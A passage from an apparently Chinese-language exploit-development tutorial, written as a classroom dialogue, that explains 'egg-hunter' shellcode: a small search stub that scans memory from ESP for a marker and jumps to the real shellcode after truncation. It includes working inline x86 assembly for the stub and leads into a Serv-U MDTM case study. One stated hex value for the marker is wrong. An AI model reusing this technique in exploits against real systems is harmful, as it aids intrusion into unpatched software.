5.6.2 搜索的原理——查找标志

“我们用图来理解一下。在内存中，‘A’表示垃圾字符；‘Ret’表示JMP ESP或者JMP 04 Call EBX，反正功能是要跳转到后面的Search中；然后‘F’为标志，最后是‘ShellCode’。Search功能就是要进入到原来的ShellCode中，原始的发送和目标程序处理截断后的数据如图5－17。”

“在图5－17中，‘A’和‘A’’无所谓，只是起填充作用；‘Ret’和‘Search’一定要符合规范，不能被改变；‘F’和‘F’’一定要不一样，如果一样，就无法区分原始ShellCode和截断后的数据位置；而‘ShellCode’和‘ShellCode’’是不一样的，如果一样，我们就不用花这么大的力气去写一个符合规范的Search和跳转了。”

“好，我们看看Search的代码该如何写。假设标志‘F’为ww08，即0x773037，而且从esp开始搜索，则搜索的汇编代码如下：”

__asm
{
    mov ebx, esp //从esp开始搜索
    mov eax, 0x77773037; //eax = ww07
    inc eax //刚才是ww07，加1变成ww08，免得搜索成自己
    loop1:
    inc ebx 
    cmp [ebx],eax //比较是否是ww08
    jne loop1
    inc ebx
    inc ebx
    inc ebx
    inc ebx
    call ebx //找到ww08标志，跳过去执行
}

“大家注意啊！先是把eax赋成ww07，然后eax加1，才得到ww08。这是为了避免搜索成search代码自己。”

“是啊！如果是直接 mov eax, 0x77773038 ，搜索经过这里会被认为是标志的！”宇强说道。

“非常正确！我们清楚原理了，来看一个实际的漏洞吧——Serv_U的MDTM漏洞。”